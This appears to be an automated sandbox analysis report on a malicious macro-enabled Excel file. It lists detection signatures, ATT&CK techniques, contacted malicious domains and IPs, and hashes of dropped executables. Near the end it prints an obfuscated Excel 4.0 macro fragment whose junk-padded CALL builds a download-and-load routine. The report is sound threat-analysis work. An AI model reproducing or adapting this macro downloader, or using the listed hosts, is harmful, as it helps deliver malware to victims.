Play interactive tourEdit tour
Analysis Report documents-2112491607.xlsm
Overview
General Information
Detection
Hidden Macro 4.0
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Machine Learning detection for dropped file
Office process drops PE file
Allocates a big amount of memory (probably used for heap spraying)
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Antivirus detection for URL or domain | Show sources |
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Machine Learning detection for dropped file | Show sources |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (creates forbidden files) | Show sources |
Source: | File created: | Jump to behavior |
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | Memory has grown: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking: |
---|
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) | Show sources |
Source: | Snort IDS: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Binary string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: |
Source: | File opened: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Process Injection1 | Masquerading121 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution43 | Boot or Logon Initialization Scripts | Extra Window Memory Injection1 | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol13 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting21 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Extra Window Memory Injection1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Joe Sandbox ML | |||
100% | Joe Sandbox ML |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
4% | Virustotal | Browse | ||
2% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
kautilyaclasses.com | 192.185.56.250 | true | false |
| unknown |
bodylanguage.santulan.co.in | 111.118.215.222 | true | true |
| unknown |
corwin-tommie06f.ru.com | 8.211.4.209 | true | false |
| unknown |
katelynn9506a.ru.com | 8.211.4.209 | true | false |
| unknown |
kullumanalitours.com | 103.211.216.55 | true | false | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
true |
| unknown | |
false |
| unknown | |
true |
| unknown | |
true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| low |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
103.211.216.55 | kullumanalitours.com | Seychelles | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false | |
192.185.56.250 | kautilyaclasses.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false | |
8.211.4.209 | corwin-tommie06f.ru.com | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false | |
111.118.215.222 | bodylanguage.santulan.co.in | India | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 383123 |
Start date: | 07.04.2021 |
Start time: | 09:14:09 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 38s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | documents-2112491607.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 9 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.expl.evad.winXLSM@11/12@5/4 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
103.211.216.55 | Get hash | malicious | Browse |
| |
192.185.56.250 | Get hash | malicious | Browse |
| |
8.211.4.209 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
111.118.215.222 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
|
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
bodylanguage.santulan.co.in | Get hash | malicious | Browse |
| |
kullumanalitours.com | Get hash | malicious | Browse |
| |
corwin-tommie06f.ru.com | Get hash | malicious | Browse |
| |
kautilyaclasses.com | Get hash | malicious | Browse |
| |
katelynn9506a.ru.com | Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
UNIFIEDLAYER-AS-1US | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
PUBLIC-DOMAIN-REGISTRYUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
PUBLIC-DOMAIN-REGISTRYUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 138083 |
Entropy (8bit): | 5.497215326378405 |
Encrypted: | false |
SSDEEP: | 1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W |
MD5: | A26AB60FB8F4C1FCB0A37955433F241B |
SHA1: | E5316BCF28CA90B78A7CDBDE64B2DBC05A7A8D3B |
SHA-256: | 3D383CC929E2A80A8466767FAF9726E56CDA26DEC1D9249DF447629A6A113BB6 |
SHA-512: | CA5CA64E4A7A6A366BB1335C9339D40ECC2ECC9B393AC6D0DB74FA0D995155E39286FB9FBE096C252A2AD7E33A892039960503A0DE1F9805CCDD8E197525D2AD |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
IE Cache URL: | http://bodylanguage.santulan.co.in/ds/index.html |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8301 |
Entropy (8bit): | 7.970711494690041 |
Encrypted: | false |
SSDEEP: | 192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh |
MD5: | D8574C9CC4123EF67C8B600850BE52EE |
SHA1: | 5547AC473B3523BA2410E04B75E37B1944EE0CCC |
SHA-256: | ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B |
SHA-512: | 20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8854 |
Entropy (8bit): | 7.949751503848125 |
Encrypted: | false |
SSDEEP: | 192:VS+uZNogNC+NXtYvselFpeBnmMYCft0gVaSgZTaG+3uWYvVZmSGQ9pFT+x5ylxvr:03CbJ+mMYCmgUrNaB3uzvPm1UpFimlxj |
MD5: | 780FD0ABF9055E2D8FA1BAB6D4B9163E |
SHA1: | CFCD5C73C9C517161DEC8D4B01ABFCA4B272AEBE |
SHA-256: | 6A3CDBFDB8911742673C2882E912369BC525A7BD41C9B6EFC5C9A84DAFF6C3B2 |
SHA-512: | 8359AF512FA5771EB542B1A854F15E74555C7E1F956924520AC6CEBBAE1322D27AC8FBDD390275C5A31223613986B0CBF5871A406CA2DDBB996B9EB7A94E871A |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 557 |
Entropy (8bit): | 7.343009301479381 |
Encrypted: | false |
SSDEEP: | 12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd |
MD5: | A516B6CB784827C6BDE58BC9D341C1BD |
SHA1: | 9D602E7248E06FF639E6437A0A16EA7A4F9E6C73 |
SHA-256: | EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074 |
SHA-512: | C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 848 |
Entropy (8bit): | 7.595467031611744 |
Encrypted: | false |
SSDEEP: | 24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc |
MD5: | 02DB1068B56D3FD907241C2F3240F849 |
SHA1: | 58EC338C879DDBDF02265CBEFA9A2FB08C569D20 |
SHA-256: | D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F |
SHA-512: | 9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 96847 |
Entropy (8bit): | 7.870690149733864 |
Encrypted: | false |
SSDEEP: | 1536:m/JIWQub3DLc6SqhlWxDbl2hawHusD9Byrty30wEGttZv9xEfgI:GJIW9bTdS7lMHfD9ByrtyOG7ZVxET |
MD5: | 00AF2D8EB13A69B0A52ABFB800D69F9F |
SHA1: | 3AF09FD82CCA333CC70CB6394A7EC315F5FE6AF1 |
SHA-256: | 0B91BE6A537CF8CA45B5CAD74C244466C36150D0814A624D1A98CEF08B69F603 |
SHA-512: | 2214669F1315B5F60B2E300B873AC98EBF2A0C57943FCEEB4ED41D431C6D8708D5EAD2A7F2D510C45AAC2321CC45292EEE7E504CD304A618DCC65A69DEAFE226 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.489142053628293 |
Encrypted: | false |
SSDEEP: | 12:85QENcLgXg/XAlCPCHaXtB8XzB/XURvX+WnicvbRbDtZ3YilMMEpxRljK5TdJP9O:85JK/XTd6j0YeBDv3qYrNru/ |
MD5: | 9C40617F346B87D23DC5454B7267E33A |
SHA1: | B87124245ACDB8EDF4EE972366790CC463CDBDDC |
SHA-256: | 223CD23880148DA3DEC1729E43E7735385478231A1BDE95A0E89C438C420623B |
SHA-512: | 097B24FAE265EC38060C7B05B10025503D2E49FC3E099853E913841E42C6E7BB4AA0EE7EA6F39710C6533D49C3CAEA3E24E42A16D1F127587794E4CCCBE1D3E1 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2138 |
Entropy (8bit): | 4.547087478186962 |
Encrypted: | false |
SSDEEP: | 24:8bz2/XTd6jFyD2nhe8WDv3qYdM7dD2bz2/XTd6jFyD2nhe8WDv3qYdM7dV:8+/XT0jFY2nhdYQh2+/XT0jFY2nhdYQ/ |
MD5: | FD2F42E72FB642FA79B3F38914DB4B03 |
SHA1: | 96D1AD382852122C29334DFB5CE89A13DD14C8F3 |
SHA-256: | 8C69F2F1A47257D91955C5E9AC888608AA6234EEECFEAD7BCEB4B268B747ECBA |
SHA-512: | 069397B0B527C31C843AAEBF778965D48E446F0958B536D57CE7C5DA68A801C90FA90699DFBFD1C68FCC93FB06EBFA5A6BE204BAA47FD089F4597C050A8073BB |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 115 |
Entropy (8bit): | 4.745678829632436 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWKS9LRzcOHZELRzcOHmxWKS9LRzcOHv:dj49Ll5ELlt9LlP |
MD5: | 153B80C9C6025C6926C8F0A15B781156 |
SHA1: | A4B5E632F8E2282BA31EF56938E23F0BAC5DAD1F |
SHA-256: | 1E02E4944F11BD25D085F2B96AECB9912DEBC942C411D1E85603DFFCF69E2F65 |
SHA-512: | 7EDD7295338EFC23F23A3B55F3AD1832A297701F58CB68AF080594D8C119BA3FBAB32BC55DCFBA231C65E40E5CA313A74217B2B8948F035ECA6979281E4165F4 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 96847 |
Entropy (8bit): | 7.870690149733864 |
Encrypted: | false |
SSDEEP: | 1536:m/JIWQub3DLc6SqhlWxDbl2hawHusD9Byrty30wEGttZv9xEfgI:GJIW9bTdS7lMHfD9ByrtyOG7ZVxET |
MD5: | 00AF2D8EB13A69B0A52ABFB800D69F9F |
SHA1: | 3AF09FD82CCA333CC70CB6394A7EC315F5FE6AF1 |
SHA-256: | 0B91BE6A537CF8CA45B5CAD74C244466C36150D0814A624D1A98CEF08B69F603 |
SHA-512: | 2214669F1315B5F60B2E300B873AC98EBF2A0C57943FCEEB4ED41D431C6D8708D5EAD2A7F2D510C45AAC2321CC45292EEE7E504CD304A618DCC65A69DEAFE226 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 138083 |
Entropy (8bit): | 5.497215326378405 |
Encrypted: | false |
SSDEEP: | 1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W |
MD5: | A26AB60FB8F4C1FCB0A37955433F241B |
SHA1: | E5316BCF28CA90B78A7CDBDE64B2DBC05A7A8D3B |
SHA-256: | 3D383CC929E2A80A8466767FAF9726E56CDA26DEC1D9249DF447629A6A113BB6 |
SHA-512: | CA5CA64E4A7A6A366BB1335C9339D40ECC2ECC9B393AC6D0DB74FA0D995155E39286FB9FBE096C252A2AD7E33A892039960503A0DE1F9805CCDD8E197525D2AD |
Malicious: | true |
Antivirus: |
|
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.8821840433354 |
TrID: |
|
File name: | documents-2112491607.xlsm |
File size: | 96877 |
MD5: | cada6b07929cd03002206f65f547f383 |
SHA1: | e4b72830f1f320d711f60f540a8fe9340597238e |
SHA256: | b9b231cad810dedef1d27772b12d04e8aa4e9ef0f461d5a0fbf80d3c38918860 |
SHA512: | 930c2ed9bf01b1c22189985f47800b11b2d116d5210a6f712f12ea25d7d4d52c165b7c9531d902487e341d9ebf35c4f3768ada1299b0ad9cab91d95f1b36fc15 |
SSDEEP: | 1536:4h1M4Kfra8zxQz8jbztonsBjFC6QomaIRUxPLe96bGAfe2hawno:4h1M4kra8Wz8jbzSn4BC6Qdkx60WMo |
File Content Preview: | PK..........!...`.............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "documents-2112491607.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""..\oeiwkd""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL(""U""&AM19&""n"",AM20&""A"",AM30,'Doc2'!AR84,before.2.0.0.sheet!AM23,before.2.0.0.sheet!AO15&"".dll"",0,0)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY